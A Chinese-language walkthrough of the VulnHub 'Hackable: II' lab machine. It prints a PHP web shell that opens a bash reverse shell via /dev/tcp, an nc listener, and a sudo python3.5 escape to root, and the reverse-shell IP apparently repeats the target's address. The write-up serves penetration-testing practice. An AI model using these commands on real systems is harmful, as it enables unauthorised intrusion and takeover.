vulnhub-HACKABLE: II

攻击机：

Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux

靶机：

 一、信息收集。

nmap 192.168.1.1/24

注意：这里我用的vm虚拟机会出现网卡报错，获取不到地址。后面看了大佬们的wp，说是要用Virtualbox。

这就扫出来了。

nmap -sS -sV -A -p- 192.168.1.110

再扫描详细端口信息。

（1）21端口，仅开放了root用户的写入权限。权限等级为644。

（2）80端口是Apache的服务。

（3）linux 的内核信息等。

访问一下它的80端口。

弹出Apache的页面，扫一下目录。

收集到这么几个子域名，

全部访问一下后发现，就只有http://192.168.1.110/files/这个子链的有价值，感觉可以通过上传马子到这里，然后进行访问。

这里咱们思路往前理，最开始咱们看到这台靶机开通了21端口，而且权限为644.代表普通用户可以读。

在看这里，

 ftp-anon: Anonymous FTP login allowed (FTP code 230)

翻译过来就是允许匿名登陆，那我们尝试登录下。

登上了。

查看文件是call.html

 这里ftp的上传命令是put，下载命令是get。

尝试随便上传一个文件试试，

上传一个测试页面。

可以成功执行php文件，上传一句话木马：

<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.1.110/4321 0>&1' ");
?>

这里我用netcat来弹shell。

 

kali开启监听：nc -lvvp 4321

浏览器访问该文件。成功弹回shell。

查看内核信息。

 胡乱翻了一下，再/home目录下发现了一个important.txt文件

 打开看看

提示我们要先运行runme.sh

发现了sherek。看这像md5的一串值。丢进去解密一下。

md5在线解密破解,md5解密加密

出现了一个onion。盲猜是密码，开始以为是root密码，后面试了下不对，然后用用户名sherek测试。

成功登陆。

目录下有一个文件，打开后最末尾处 有个链接。

 

好像没啥用，是领英的登陆网址。

随便翻翻也没啥东西，那就提权吧。

查看一下权限。

(root) NOPASSWD: /usr/bin/python3.5。这一句翻译过来的大概的意思是，python3.5可以提权。

 然后去查询一下python的提权语句。

找到了这个。测试一下。这里用的是python3.5，所以要修改一下语句。

sudo python3.5 -c 'import os; os.system("/bin/sh")'

 成功提权。

然后开始找flag。

 

 成功拿到flag。本题结束，这道题的限制较小。